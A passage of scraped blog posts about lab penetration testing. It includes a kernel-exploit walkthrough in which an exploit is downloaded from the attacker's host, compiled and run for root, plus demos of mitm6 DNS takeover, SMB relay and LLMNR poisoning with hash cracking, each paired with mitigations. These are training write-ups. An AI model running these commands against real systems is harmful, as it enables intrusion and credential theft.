escalation vectors.\nNote: Install and try a few automated enumeration tools on your own local Linux distribution for practice.\nNo answer is needed for this task in the TryHackMe room.\n✅ CVE-2015-1328 Vulnerability Description Vulnerability Name: Linux Kernel 3.13.0 \u0026lt; 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - \u0026lsquo;overlayfs\u0026rsquo; Local Privilege Escalation CVE ID: CVE-2015-1328 Exploit Type: Local Privilege Escalation\nAffected Systems:\nUbuntu 12.04, 14.04, 14.10, 15.04 Linux Kernel versions 3.13.0 through 3.19 (on vulnerable distributions) 🔎 Vulnerability Overview This vulnerability exists in the overlayfs filesystem implementation in affected versions of the Linux kernel. Overlayfs is a union mount filesystem that allows a virtual merge of two filesystems.\nThe issue stems from improper permission checking when a user mounts an overlay filesystem. In these vulnerable kernel versions, unprivileged users can exploit overlayfs to perform unauthorized operations.\nAn unprivileged local user can leverage this flaw to gain root-level access by exploiting the flawed permissions of the overlay mounts.\n⚠️ Exploit Details The overlayfs functionality doesn\u0026rsquo;t properly verify access control during mount operations. Attackers can mount overlay filesystems in restricted locations and override files in a way that allows them to escalate privileges. An unprivileged local user can leverage this flaw to gain root-level access by exploiting the flawed permissions of the overlay mounts.\n🛠️ Impact If successfully exploited, this vulnerability grants a local attacker full root access, allowing them to:\nRun arbitrary code as root Install rootkits Access and modify sensitive data Disable security controls This makes it a critical privilege escalation vulnerability in vulnerable Ubuntu systems.\n📅 Discovery and Patch Reported by: Philip Pettersson Fixed in: Kernel versions 3.19 and later (Ubuntu released patched kernels) Patch applied by improving permission checks on overlayfs operations, ensuring that unprivileged users can\u0026rsquo;t exploit them.\nReference: CVE-2015-1328 Details\nTask 5 - Privilege Escalation: Kernel Exploits #The goal of privilege escalation is to gain root-level access to the target system. This is often achieved by exploiting known vulnerabilities or misconfigurations that allow a user to increase their access rights.\nOn Linux systems, the kernel controls communication between hardware and software. Because of its critical role, the kernel runs with high privileges. Successfully exploiting a kernel vulnerability can lead to complete system compromise.\nKernel Exploit Methodology #Exploiting kernel vulnerabilities generally involves three simple steps:\nIdentify the kernel version on the target. Search for known exploits affecting that version. Execute the exploit to escalate privileges. ⚠️ Note: Kernel exploits can be unstable. Failed attempts may crash the system (kernel panic). Always consider the risks before running them in live environments. Lab and CTF scenarios are perfect places to practice.\nResearching Kernel Exploits #Once you know the kernel version, begin your research:\nUse Google to search for known exploits (e.g., 3.13.0-24-generic exploit). Check vulnerability databases like CVE Details. Use automated tools such as LES (Linux Exploit Suggester). Be aware of potential false positives or false negatives in their reports. Important Reminders Before Running Exploits # Be specific—but not overly narrow—when searching for exploits. Understand how the exploit works before running it. Some can destabilize or weaken the system, which is unacceptable in a real penetration test. Some exploits require manual interaction after execution. Always read the instructions and comments provided by the exploit author. To transfer exploit code from your machine to the target, use Python\u0026rsquo;s SimpleHTTPServer (or http.server in Python 3) and download it with wget. In this exercise, I followed this methodology to identify and exploit CVE-2015-1328 on the target\u0026rsquo;s vulnerable kernel. Below are the exact steps I took, along with screenshots.\nDownloading and Preparing the Exploit #I downloaded the exploit to my Kali attack VM using the following command:\nwget https://www.exploit-db.com/exploits/37292 For better organization, I renamed the file with a .c extension and moved it to my transfers directory:\nsudo mv 37292 /home/nisha/transfers/37292.c This step is optional, but I like to keep my files organized by function and target.\nHosting a Web Server to Transfer the Exploit #Next, I hosted a Python web server on port 8080 from my Kali VM to serve the exploit to the target machine:\npython3 -m http.server 8080 Transferring and Executing the Exploit on the Target VM #First, I verified my Kali VM\u0026rsquo;s IP address using the ifconfig command. My IP was 10.2.119.123.\nifconfig Downloading the Exploit on the Target Machine #On the target VM, I navigated to the /tmp directory since it is typically world-writable. Then, I downloaded the exploit from my Kali machine\u0026rsquo;s Python web server:\ncd /tmp wget http://10.2.119.123:8080/37292.c Compiling and Running the Exploit #I then compiled the downloaded .c file using gcc and created an executable binary:\ngcc 37292.c -o 37292 Finally, I ran the exploit:\n./37292 Confirming Root Access #It appeared a root shell was successfully spawned. I confirmed my privileges by running the following commands:\nwhoami id Locating and Retrieving the Flag #While still in /tmp, I navigated to the /home directory and listed its contents:\ncd /home ls I noticed a home directory for matt. Inside that folder, I found the flag1.txt file and viewed its contents:\ncd matt ls cat flag1.txt I could have used a find command to save a few extra keystrokes, but the mission is accomplished, nonetheless!!\nfind / -name \u0026#34;flag1.txt\u0026#34; 2\u0026gt;/dev/null Switching to Defense: How Can We Stop This? #After gaining root access through a kernel exploit, it\u0026rsquo;s critical to understand how defenders can prevent, detect, and mitigate these attacks. Let\u0026rsquo;s break it down using the MITRE ATT\u0026amp;CK Framework.\nDefender\u0026rsquo;s Corner #Now that we\u0026rsquo;ve demonstrated how an attacker can escalate privileges using a kernel exploit, let\u0026rsquo;s shift our focus to the defensive side. By leveraging the MITRE ATT\u0026amp;CK Framework, defenders can identify and implement targeted controls.\nMITRE ATT\u0026amp;CK Mapping # Tactic Technique ID Privilege Escalation Exploitation for Privilege Escalation T1068 Technique Name: Exploitation for Privilege Escalation Technique ID: T1068 Description: This technique involves exploiting a software vulnerability to escalate privileges on a system, in this case by targeting a kernel flaw (CVE-2015-1328). Mitigations # Mitigation How It Applies to T1068 M1051: Patch Management Regular kernel patching prevents exploitation of known vulnerabilities like CVE-2015-1328. M1038: Execution Prevention Use security modules such as SELinux or AppArmor to block unauthorized code execution, especially in common temp directories like /tmp. M1047: Audit and Monitor Process Execution Log and alert on suspicious activity, such as compiling code with gcc or executing binaries from unusual locations. M1018: Privileged Account Management Apply least privilege principles and limit users\u0026rsquo; ability to execute privileged operations or access sensitive areas of the system. References # T1068 - Exploitation for Privilege Escalation\nM1051 - Update Software\nM1038 - Execution Prevention\nM1047 - Audit\nM1018 - User Account Management\nDetection Opportunities #A multi-layered detection strategy is essential for identifying and responding to privilege escalation attempts like the one demonstrated in this walkthrough. Combining log monitoring solutions with Endpoint Detection and Response (EDR) tools can provide comprehensive coverage.\nProcess Monitoring\nMonitor for unusual use of compilers like gcc by non-administrative users, especially on production systems where such tools shouldn\u0026rsquo;t be present. Splunk can aggregate and analyze logs for these anomalies.\nFile Monitoring\nWatch for the creation or execution of files in world-writable directories such as /tmp, /var/tmp, and /dev/shm. EDR solutions often provide file integrity monitoring capabilities and can alert on suspicious activity.\nUnusual Network Activity\nDetect unexpected outbound HTTP requests using tools like wget or curl, particularly from systems that typically do not initiate such traffic. EDR tools may offer network monitoring or integration with firewall logs.\nPrivilege Escalation Detection\nTrack instances where non-privileged users escalate to root or other administrative accounts unexpectedly. EDR platforms often have built-in analytics to detect privilege escalation attempts and suspicious privilege elevation events.\nKernel Module Monitoring\nMonitor kernel module loading events to detect potential rootkits or malicious kernel manipulations post-exploitation. This is an area where advanced EDR solutions that support Linux endpoints can add significant value.\nHardening Recommendations # Keep Systems Patched:\nRegularly update your Linux kernels and other software. Subscribe to distribution security mailing lists (Ubuntu Security Announcements, etc.) for timely notifications.\nRestrict Compiler Access:\nRemove unnecessary development tools like gcc from production environments. If they are required, restrict their use to specific administrative accounts.\nImplement Mandatory Access Controls (MAC):\nEnable and configure SELinux or AppArmor to restrict the actions that processes and users can perform, reducing the chance of successful exploitation.\nSecure Temporary Directories:\nMount /tmp, /var/tmp, and /dev/shm with the noexec and nodev options to prevent execution of binaries from these locations.\nKey Takeaways # Privilege escalation exploits are powerful, but they rely on unpatched vulnerabilities and insecure configurations. Proactive system hardening, robust patch management, and continuous monitoring are critical in reducing your organization\u0026rsquo;s risk exposure. Understanding the attack paths helps defenders implement targeted controls that can prevent or detect similar threats in the future. Conclusion #This walkthrough showcased both offensive techniques—exploiting CVE-2015-1328 for privilege escalation—and defensive strategies based on the MITRE ATT\u0026amp;CK Framework.\nAs defenders, staying ahead of these threats requires a solid understanding of how attackers operate and leveraging tools and frameworks to harden systems, detect attacks, and respond effectively.\n➡️ If you found this guide helpful, follow me for more offensive and defensive cybersecurity content!\n➡️ Stay sharp!\n➡️ Notes By Nisha\n","date":"October 11, 2024","permalink":"https://notesbynisha.com/posts/2024-10-11-escalate-and-defend-linux-kernel-exploit/","section":"Writing","summary":"A dual perspective walkthrough of TryHackMe\u0026rsquo;s Linux Privilege Escalation room (Kernel Exploits), including offensive steps and defense strategies mapped to the MITRE ATT\u0026amp;CK Framework.","title":"Escalate and Defend: Linux Kernel Exploit Walkthrough"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/kernel-exploits/","section":"Tags","summary":"","title":"Kernel Exploits"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/active-directory/","section":"Tags","summary":"","title":"Active Directory"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/ethical-hacking/","section":"Tags","summary":"","title":"Ethical Hacking"},{"content":"Table of Contents # Introduction Understanding IPv6 DNS Takeover Mitigation Strategies Demonstration Steps Step 1: Setup NTLM Relay using LDAPS Step 2: Run MITM6 Simulate Event and Capture Data Simulate Login and Gain Access Conclusion Introduction #In this blog post, I will walk you through a demonstration of an IPv6 DNS takeover attack using the mitm6 (Man in the Middle for IPv6) tool in an Active Directory (AD) pentesting environment. This type of attack exploits weaknesses in the network\u0026rsquo;s handling of IPv6, allowing an attacker to become a Man-in-the-Middle (MITM) and relay NTLM authentication requests to a Domain Controller (DC).\nUnderstanding IPv6 DNS Takeover #IPv6 DNS takeover is a network attack where an attacker uses IPv6 to become the default DNS server for the network. This allows them to intercept and manipulate DNS requests and responses. In combination with tools like NTLMRelayx, attackers can relay authentication requests to a Domain Controller, gaining unauthorized access to network resources.\nMitigation Strategies #To protect against IPv6 DNS takeover attacks, consider implementing the following mitigation strategies:\nDisable IPv6 if it is not required in your environment. Use strong authentication mechanisms, such as Kerberos, which are not vulnerable to relay attacks. Monitor network traffic for unusual IPv6 activity. Implement network segmentation to limit the impact of compromised devices. Regularly update and patch systems to fix known vulnerabilities. Demonstration Steps #Below are the steps I took to implement the IPv6 DNS takeover attack using mitm6 and NTLMRelayx tools in my Active Directory pentesting lab.\nStep 1: Setup NTLM Relay using LDAPS #First, I set up NTLM relay using LDAPS with the Domain Controller (DC) as the target. This step involves using a previously set up certificate.\nsudo ntlmrelayx.py -6 -t ldaps://192.168.86.30 -wh fakewpad.marvel.local -l lootme Step 2: Run MITM6 (Man in the Middle 6) #Next, I executed mitm6 to start the Man-in-the-Middle attack for IPv6 on the target domain marvel.local.\nsudo mitm6 -d marvel.local IP addresses start to get assigned here, we are becoming the MITM for IPv6 for these devices.\nWhen an event occurs on network, reboot, logging into a device, will allow us to take that event and relay it via NTLM relay to the Domain Controller.\nTo trigger the attack, I simulated an event by rebooting a machine, specifically Punisher. This action allowed us to capture and relay authentication events via NTLM relay to the Domain Controller.\nAfter rebooting Punisher, we captured a significant amount of data from the LDAP domain dump, including details about domain computers, groups, and users. Finally, I simulated a login on the network by logging into THEPUNISHER as MARVEL\\administrator. The attack was successful, allowing us to set access controls and create a new user account with elevated privileges.\nDomain Computers\nDomain Groups\nDomain Users\nSimulate login on the network, log into THEPUNISHER, as MARVEL\\administrator\nAttack is successful, Access Controls are set and a new user account gets created for us and we are able to login with this username and password.\nWith the newly created account, we could perform further attacks, such as a DCSync attack using secretsdump.py, to compromise the entire domain.\nThis user account was created as just a domain admin, so it will not have access to every single computer in the domain. However, they will have access to the Enterprise Admins group and they will have very specific access to run secretsdump.py against the domain controller, dump out the entire secrets of the domain, and they\u0026rsquo;ll compromise the domain. And then, you can utilize the hashes that you find there to completely own the domain whichever way you want.\nConclusion #This lab demonstration highlights the critical vulnerabilities associated with IPv6 DNS takeover attacks. By exploiting weaknesses in network configurations and authentication protocols, attackers can gain unauthorized access to sensitive information and control over network resources.\nTo protect your organization from such attacks, it\u0026rsquo;s essential to implement effective security measures, such as disabling IPv6 if not needed, using strong authentication mechanisms like Kerberos, and continuously monitoring for unusual network activity. Regularly updating and patching systems also plays a crucial role in mitigating these risks.\nUnderstanding and addressing these vulnerabilities is vital for maintaining a secure and resilient network infrastructure. As always, staying informed about the latest threats and best practices in cybersecurity is key to defending against potential attacks.\nFeel free to share your thoughts and experiences with similar attacks in the comments below. Stay safe and secure!\n","date":"July 22, 2024","permalink":"https://notesbynisha.com/posts/2024-07-26-ad-attack-ipv6-dns-takeover-via-mitm6/","section":"Writing","summary":"\u003ch2 id=\"table-of-contents\" class=\"relative group\"\u003eTable of Contents \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#table-of-contents\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003col\u003e\n\u003cli\u003e\u003ca href=\"#introduction\"\u003eIntroduction\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"#understanding-ipv6-dns-takeover\"\u003eUnderstanding IPv6 DNS Takeover\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"#mitigation-strategies\"\u003eMitigation Strategies\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"#demonstration-steps\"\u003eDemonstration Steps\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"#step-1-setup-ntlm-relay-using-ldaps\"\u003eStep 1: Setup NTLM Relay using LDAPS\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"#step-2-run-mitm6\"\u003eStep 2: Run MITM6\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"#simulate-event-and-capture-data\"\u003eSimulate Event and Capture Data\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"#simulate-login-and-gain-access\"\u003eSimulate Login and Gain Access\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"#conclusion\"\u003eConclusion\u003c/a\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"introduction\" class=\"relative group\"\u003eIntroduction \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#introduction\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003eIn this blog post, I will walk you through a demonstration of an IPv6 DNS takeover attack using the mitm6 (Man in the Middle for IPv6) tool in an Active Directory (AD) pentesting environment. This type of attack exploits weaknesses in the network\u0026rsquo;s handling of IPv6, allowing an attacker to become a Man-in-the-Middle (MITM) and relay NTLM authentication requests to a Domain Controller (DC).\u003c/p\u003e","title":"IPv6 DNS Takeover with MITM6 in an Active Directory Environment"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/mitm6/","section":"Tags","summary":"","title":"Mitm6"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/ntlm-relay/","section":"Tags","summary":"","title":"NTLM Relay"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/offensive/","section":"Tags","summary":"","title":"Offensive"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/pnpt-exam/","section":"Tags","summary":"","title":"PNPT Exam"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/red-team/","section":"Tags","summary":"","title":"Red Team"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/smb/","section":"Tags","summary":"","title":"SMB"},{"content":"Introduction #In the world of network security, understanding various attack vectors is critical to safeguarding systems and data. One such attack is the SMB (Server Message Block) Relay attack, which exploits vulnerabilities in the SMB protocol commonly used in Windows environments. This article will explore what an SMB Relay attack is, the steps involved in executing such an attack, and mitigation strategies to reduce the associated risks. Additionally, I will include screenshots and steps from my lab demonstration using the Responder tool and NTLM Relay X.\nWhat is an SMB Relay Attack? #An SMB Relay attack is a type of Man-in-the-Middle (MitM) attack where an attacker intercepts and relays SMB authentication requests to a target server. This allows the attacker to authenticate themselves on behalf of the victim without knowing their credentials. The attack takes advantage of weak or misconfigured SMB services that allow for relay attacks, particularly when SMB signing is not enforced.\nSteps Involved in an SMB Relay Attack # Identify Hosts without SMB Signing:\nThe attacker scans the network to identify hosts that do not have SMB signing enforced, making them vulnerable to relay attacks. Attacker Configures Responder to Relay Requests:\nThe attacker sets up the Responder tool to capture and relay SMB authentication requests on the network. Run Responder:\nThe attacker runs Responder to listen for and capture SMB authentication requests from network hosts. Attacker Setup Relay X:\nThe attacker configures NTLM Relay X to relay the captured authentication requests to the target server. A Triggering Event Occurs:\nAn event, such as a user attempting to access a network resource, triggers the SMB authentication process. The attacker intercepts and relays the authentication request using NTLM Relay X. Relay Side: Hashes of the SAM Get Dumped:\nThe relayed authentication request results in the dumping of hashes from the Security Account Manager (SAM) database on the target server. The attacker can crack these hashes to reveal passwords. Interactive Shell with -i Command:\nThe attacker can create an interactive shell using the -i command with NTLM Relay X, allowing for direct interaction with the target system. Send Commands with -c Option:\nThe attacker can send specific commands to the target system by adding the -c option to NTLM Relay X. Mitigation Strategies for SMB Relay Attacks # Enforce SMB Signing:\nEnabling SMB signing on all systems ensures that SMB packets are digitally signed, preventing tampering and relay attacks. This can be configured via Group Policy: Computer Configuration -\u0026gt; Policies -\u0026gt; Windows Settings -\u0026gt; Security Settings -\u0026gt; Local Policies -\u0026gt; Security Options Enable \u0026ldquo;Microsoft network client: Digitally sign communications (always)\u0026rdquo; and \u0026ldquo;Microsoft network server: Digitally sign communications (always)\u0026rdquo;. Disable SMBv1:\nSMBv1 is an older version of the SMB protocol that is more susceptible to attacks. Disabling it reduces the attack surface. This can be done via Group Policy or through Windows features settings. Use Strong Authentication Methods:\nImplement multi-factor authentication (MFA) to add an extra layer of security, making it harder for attackers to exploit relayed credentials. Segment the Network:\nNetwork segmentation limits the spread of an attack by isolating essential systems and services from the rest of the network. Regularly Update and Patch Systems:\nKeep all systems and software up-to-date with the latest security patches to protect against known vulnerabilities. Monitor and Detect:\nUse network monitoring tools to detect unusual activities and potential MitM attacks. Implement alerting mechanisms to respond quickly to suspicious behavior. Demonstration: SMB Relay Attack Using Responder and NTLM Relay X # Identify Hosts without SMB Signing Enabled and Enforced: Scanned the network to find vulnerable hosts.\nnmap --script=smb2-security-mode.nse -p 445 \u0026lt;target IP address\u0026gt; -Pn Create a targets file:\nsudo nano target.txt Configure Responder to Relay Requests: Set up Responder to capture and relay SMB authentication requests.\nsudo mousepad /etc/responder/Responder.conf Switch off SMB and HTTP:\nRun Responder: Executed Responder to listen for SMB authentication attempts.\nsudo responder -I eth0 Setup NTLM Relay X: Configured NTLM Relay X to relay captured credentials to the target server.\nsudo python3 ntlmrelayx.py -smb2support -tf targets.txt Triggering Event: Captured SMB authentication request when a user tried to access a network resource.\nDump SAM Hashes: Relayed the authentication request and dumped the hashes from the SAM database.\nInteractive Shell: Created an interactive shell using the -i command.\nntlmrelayx.py -tf targets.txt -smb2support -i Send Commands: Sent specific commands to the target system using the -c option.\nntlmrelayx.py -tf targets.txt -smb2support -c \u0026#34;whoami\u0026#34; Conclusion #Understanding and mitigating SMB Relay attacks is critical for maintaining the security of networked systems. By enforcing SMB signing, disabling SMBv1, using strong authentication methods, segmenting the network, keeping systems updated, and monitoring network activities, organizations can significantly reduce the risk of such attacks. The lab demonstration provided practical insights into how these attacks are executed and the importance of implementing robust security measures.\nFeel free to reach out with any questions or comments on this topic. Stay secure!\n","date":"July 22, 2024","permalink":"https://notesbynisha.com/posts/2024-07-22-understanding-smb-relay-attacks-and-mitigation-techniques/","section":"Writing","summary":"\u003ch2 id=\"introduction\" class=\"relative group\"\u003eIntroduction \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#introduction\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003eIn the world of network security, understanding various attack vectors is critical to safeguarding systems and data. One such attack is the SMB (Server Message Block) Relay attack, which exploits vulnerabilities in the SMB protocol commonly used in Windows environments. This article will explore what an SMB Relay attack is, the steps involved in executing such an attack, and mitigation strategies to reduce the associated risks. Additionally, I will include screenshots and steps from my lab demonstration using the Responder tool and NTLM Relay X.\u003c/p\u003e","title":"Understanding SMB Relay Attacks and Mitigation Techniques"},{"content":"","date":"July 22, 2024","permalink":"https://notesbynisha.com/posts/2024-07-28-passback-attacks/","section":"Writing","summary":"","title":"Understanding SMB Relay Attacks and Mitigation Techniques"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/llmnr/","section":"Tags","summary":"","title":"LLMNR"},{"content":"Introduction #In this blog post, I discuss a common network attack called Link-Local Multicast Name Resolution (LLMNR) poisoning. This type of attack can be highly effective in capturing NTLMv2 hashes, which can then be used to gain unauthorized access to systems in a Windows environment. I will also share insights on how to mitigate this this type of vulnerability attack, ensuring your network remains secure. To illustrate this attack, I have included screenshots from my recent lab demonstration where I successfully captured NTLMv2 hashes using Responder. What is LLMNR Poisoning? #Link-Local Multicast Name Resolution (LLMNR) is a protocol that allows computers on the same local network to perform name resolution for hosts when DNS queries fail. LLMNR operates similarly to NetBIOS over TCP/IP, enabling name resolution by sending multicast queries to all devices in the same subnet.\nLLMNR poisoning is an attack technique where an attacker responds to these multicast queries pretending to be the requested host. By doing so, the attacker can capture sensitive information such as usernames and hashed passwords (NTLMv2 hashes). This information can be further exploited to perform pass-the-hash attacks or brute-force the password offline.\nHow LLMNR Poisoning Works # Network Monitoring: The attacker monitors the network for LLMNR and NetBIOS Name Service (NBT-NS) requests using tools like Responder. Spoofing Responses: When a legitimate LLMNR request is broadcasted (e.g., a user mistypes a network resource name), the attacker’s machine responds to the query, pretending to be the requested resource. Capturing Hashes: The requesting machine, believing it has found the correct resource, sends its credentials (in the form of NTLMv2 hashes) to the attacker. Hash Exploitation: The attacker captures these hashes and can either brute-force them offline or use them in pass-the-hash attacks to gain unauthorized access to the network. Demonstration: Capturing NTLMv2 Hashes with Responder #In my lab setup, I simulated an LLMNR poisoning attack using the Responder tool. Below are the steps I followed, along with screenshots from the demonstration:\nSetting up Responder: I configured Responder to listen for LLMNR and NBT-NS queries on my local network. Triggering Event: I triggered an LLMNR event by initiating a connection to the SMB share from a legitimate user account via a client machine on the network. Capturing Queries: As soon as a legitimate user made an LLMNR request, Responder intercepted and responded to the query. Capturing Hashes: The user’s machine sent its NTLMv2 hash to my attacking machine, which was captured and displayed by Responder. The IP address of the victim (in this example: 192.168.86.38) The domain and username of the victim (in this example: MARVEL\\fcastle) The victim’s password hash With the victim’s hash in hand, I can attempt to use several tools to crack it and uncover the user\u0026rsquo;s password.\nPreparing Hashes for Cracking: I saved the hashes into files that are suitable for use with some of the popular hash cracking tools on Kali Linux. Cracking the Hashes to Uncover the User's Password: I used Hashcat and John the Ripper tools to crack the hashes and reveal the password for the victim user. Here is used the Hashcat tool on my initial attempt to crack the user\u0026rsquo;s password hash.\n``` hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt ``` Next, I used John the Ripper to take another crack at it:\nsudo john --wordlist=/usr/share/wordlists/rockyou.txt punisher.hash Mitigating LLMNR Poisoning Attacks #To protect your network from LLMNR poisoning attacks, it is essential to implement the following mitigation strategies:\nDisable LLMNR and NBT-NS: \u0026lt;li\u0026gt;Group Policy: On Windows networks, you can disable LLMNR through Group Policy. Navigate to Computer Configuration -\u0026gt; Administrative Templates -\u0026gt; Network -\u0026gt; DNS Client and set the Turn off multicast name resolution policy to Enabled.\u0026lt;/li\u0026gt; \u0026lt;li\u0026gt;Registry: You can also disable NBT-NS by modifying the registry. Set Start to 4 in the following registry path: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\NetBT\\Parameters\\Interfaces.\u0026lt;/li\u0026gt; Use Strong Passwords: Ensure that all user accounts have strong, complex passwords to make brute-forcing NTLMv2 hashes more difficult. \u0026lt;li\u0026gt; \u0026lt;strong\u0026gt;Network Segmentation:\u0026lt;/strong\u0026gt; Implement network segmentation to limit the exposure of sensitive information and reduce the attack surface.\u0026lt;/li\u0026gt; \u0026lt;li\u0026gt;\u0026lt;strong\u0026gt;Monitor Network Traffic:\u0026lt;/strong\u0026gt; Use network monitoring tools to detect unusual LLMNR and NBT-NS traffic, which could indicate an ongoing attack.\u0026lt;/li\u0026gt; \u0026lt;li\u0026gt;\u0026lt;strong\u0026gt;Implement SMB Signing:\u0026lt;/strong\u0026gt; Enable SMB signing to protect against man-in-the-middle attacks, ensuring the authenticity of SMB communications.\u0026lt;/li\u0026gt; \u0026lt;li\u0026gt;\u0026lt;strong\u0026gt;Use DNSSEC:\u0026lt;/strong\u0026gt; Implement DNS Security Extensions (DNSSEC) to ensure the authenticity and integrity of DNS responses.\u0026lt;/li\u0026gt; \u0026lt;li\u0026gt;\u0026lt;strong\u0026gt;Restrict Local Admins:\u0026lt;/strong\u0026gt; Limiting the use of local admin on machine can decrease the risk of experiencing this type of attack\u0026lt;/li\u0026gt; \u0026lt;li\u0026gt;\u0026lt;strong\u0026gt;Educate Users:\u0026lt;/strong\u0026gt; Train users to recognize and report unusual network behavior, such as frequent authentication prompts, which could indicate an attack.\u0026lt;/li\u0026gt; Conclusion #LLMNR poisoning is a serious threat that can compromise network security by capturing NTLMv2 hashes. However, by understanding how the attack works and implementing the mitigation strategies outlined in this post, you can protect your network from such vulnerabilities. Always stay vigilant and proactive in securing your network infrastructure.\nStay safe and secure!\n","date":"July 21, 2024","permalink":"https://notesbynisha.com/posts/2024-07-21-understanding-llmnr-poisoning-attacks/","section":"Writing","summary":"\u003ch2 id=\"introduction\" class=\"relative group\"\u003eIntroduction \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#introduction\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003eIn this blog post, I discuss a common network attack called Link-Local Multicast Name Resolution (LLMNR) poisoning. This type of attack can be highly effective in capturing NTLMv2 hashes, which can then be used to gain unauthorized access to systems in a Windows environment. I will also share insights on how to mitigate this this type of vulnerability attack, ensuring your network remains secure. To illustrate this attack, I have included screenshots from my recent lab demonstration where I successfully captured NTLMv2 hashes using Responder.\n\u003cimg src=\"/assets/images/tcm-academy/tcm-llmnr-1.png\"\u003e\u003c/p\u003e","title":"Understanding LLMNR Poisoning and Mitigation Techniques"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/certification/","section":"Tags","summary":"","title":"Certification"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/ejpt/","section":"Tags","summary":"","title":"EJPT"},{"content":"Earning the INE Security Junior Penetration Tester (eJPT) certification has been a significant milestone in my cybersecurity journey. In this blog post, I\u0026rsquo;ll share my experience with the eJPT exam and the strategies that helped me succeed. Whether you\u0026rsquo;re considering this certification or preparing for the exam, I hope my insights will be useful for your own path in ethical hacking and penetration testing.\nMy INE Security Junior Penetration Tester (eJPT) certification Demystifying the eJPT: An Overview of the Certification #The INE Security Junior Penetration Tester (eJPT) certification is an entry-level credential for aspiring penetration testers and ethical hackers. It validates practical skills in information security, focusing on hands-on techniques and real-world scenarios. The eJPT is designed for those looking to enter the field of cybersecurity or enhance their existing IT skills with security expertise.\nKey aspects of the eJPT certification include:\nPractical, hands-on exam format Focus on real-world penetration testing scenarios Coverage of essential tools and methodologies used in the industry No prerequisites, making it accessible to beginners Inside the eJPT Exam: Structure, Format, and My Experience #The INE Security eJPT exam is designed to test practical skills in a hands-on environment. Here\u0026rsquo;s an overview of the exam structure:\nFormat: The exam is entirely practical, conducted in a simulated network environment. Duration: Candidates have 48 hours to complete the exam. Access: The exam is conducted online and can be taken from anywhere with a stable internet connection. Objectives: The exam simulates a real-world penetration testing scenario where you\u0026rsquo;re required to perform various tasks such as information gathering, scanning, and exploitation. Scoring: The exam is scored based on successful completion of specific objectives and findings reported. Passing score: To pass the exam, candidates need to achieve a score of 70% or higher. Retake policy: One exam retake is provided as an option. The exam environment provides all necessary tools and resources, eliminating the need for personal setup or software installation. This approach ensures a standardized testing experience for all candidates.\nIn my experience, I found the practical nature of the exam both enjoyable and beneficial. As someone who prefers hands-on learning, the exam\u0026rsquo;s structure served as an excellent assessment of my newly acquired skills. The practical challenges allowed me to apply what I had learned in a simulated real-world environment, which I found particularly satisfying.\nDuring the exam, I used Microsoft OneNote to collect my notes as I discovered information within the exam lab environment. This organizational approach proved to be very effective:\nI created and labeled a tab for each target machine by IP address and hostname I documented pertinent information about each target as I progressed throughout the exam This method helped me keep track of my findings, making it easier to revisit information and plan my next steps This approach not only helped me stay organized but also ensured I didn\u0026rsquo;t overlook any important details discovered during the exam process.\nMastering the Essentials: Key Topics Covered in the eJPT Exam #The INE Security eJPT exam covers a range of topics essential for entry-level penetration testing. Based on my experience, here are the key areas the exam focuses on:\nHost \u0026amp; Network Auditing\nScanning Enumeration File transfers OSINT (Open-source intelligence) Information gathering Assessment Methodologies\nHost discovery Identifying open ports Identifying vulnerabilities on a target Host \u0026amp; Network Pentesting\nBrute forcing Hash cracking Exploitation Pivoting Conducting exploitation with Metasploit Web Application Pentesting\nConducting web application reconnaissance Brute-forcing logins Directory busting Identifying vulnerabilities The exam emphasizes practical application of these concepts rather than just theoretical knowledge. It tests your ability to use various tools and techniques to identify and exploit vulnerabilities in a simulated environment.\nPreparation Toolkit: Resources and Strategies for eJPT Success #Preparing for the eJPT exam requires a combination of theoretical knowledge and practical skills. Here are some resources I found valuable during my 